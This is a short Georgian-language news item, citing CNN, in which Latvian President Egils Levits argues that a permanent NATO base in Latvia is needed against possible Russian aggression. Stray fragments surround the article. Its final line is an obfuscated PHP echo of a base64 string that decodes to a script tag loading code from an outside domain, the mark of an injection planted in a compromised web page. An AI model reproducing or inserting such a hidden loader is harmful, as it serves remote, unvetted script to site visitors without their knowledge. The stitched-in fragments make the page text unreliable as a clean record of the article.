celsiusi
ავერსი შნაიდერი
ლატვიის პრეზიდენტმა ეგილს ლევიტსმა ხაზგასმით აღნიშნა, რომ მის ქვეყანაში ნატოს მუდმივი სამხედრო ბაზა „აბსოლუტურად“ საჭიროა, რათა ლატვია დაცული იყოს ნებისმიერი პოტენციური რუსული აგრესიისგან, - ამის შესახებ ინფორმაციას CNN ავრცელებს.
 
”აბსოლუტურად. ნატომ უნდა გააძლიეროს ნატოს აღმოსავლეთ ფლანგი. ეს არის ბალტიისპირეთი, პოლონეთი, რუმინეთი, ასე რომ ეს იქნება ძლიერი სიგნალი მოსკოვისთვის, რომ ნატო მზადაა დაიცვას წევრი ქვეყნები“, - უთხრა ლევიტსმა CNN-ის ჟურნალისტს.
 
ლატვიის პირველმა პირმა განაცხადა, რომ ის ასევე მიესალმება ამერიკულ ჯარებს პოლონეთსა და ბალტიისპირეთში. მისი აზრით, ეს არის პასუხი რუსეთის იდეებზე უკრაინის ფარგლებს გარეთ აგრესიის შესახებ.
 
„ასე რომ, ჩვენ უნდა დავიცვათ ცხოვრების წესი, ჩვენი დემოკრატიები და ეს არის გამოცდა დასავლეთისთვის. ეს არის გამოცდა ამერიკის ხელმძღვანელობისთვის და დარწმუნებული ვარ, რომ ამერიკა და მთლიანად დასავლეთი ამ გამოცდას ჩააბარებენ“, - დასძინა ლატვიის პრეზიდენტმა.
915
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");